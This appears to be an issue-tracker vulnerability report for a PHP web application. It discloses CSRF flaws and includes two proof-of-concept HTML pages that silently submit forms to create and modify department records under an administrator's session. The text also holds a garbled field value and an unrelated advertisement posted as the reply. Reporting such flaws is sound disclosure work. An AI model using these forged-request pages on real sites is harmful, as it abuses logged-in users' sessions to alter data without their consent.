several CSRF vulnerabilities that can perform CRUD operations

Question

several CSRF vulnerabilities that can perform CRUD operations

Opened this issue 2 years ago · 1 comments

After the login as administrator,the poc below opened in another html can force a database CRUD operation.
such as new department creation:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/v1/index.php/Dept/dept_add/" method="POST">
      <input type="hidden" name="name" value="1234" />
      <input type="hidden" name="tel" value="1234" />
      <input type="hidden" name="fax" value="1234" />
      <input type="hidden" name="parentID" value="29" />
      <input type="hidden" name="sort" value="2" />
      <input type="hidden" name="visible" value="1" />
      <input type="hidden" name="intro" value="1234" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

and department modify:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/v1/index.php/Dept/dept_modify/id/31" method="POST">
      <input type="hidden" name="name" value="�&#147;&#129;�&#137;&#140;�&#131;&#168;" />
      <input type="hidden" name="tel" value="123456" />
      <input type="hidden" name="fax" value="123456" />
      <input type="hidden" name="parentID" value="29" />
      <input type="hidden" name="sort" value="1" />
      <input type="hidden" name="visible" value="1" />
      <input type="hidden" name="intro" value="123456" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Answer 1 · 2022-10-15T13:43:25.000Z

成都零起飞网站建设专为成都中小型企业、团体及个人提供网站制作、网站设计、网站二次开发、网络维护、网站域名空间、网站策划、FLASH动画设计、网站优化（SEO） QQ号码：1871720801 网站：http://www.07fly.com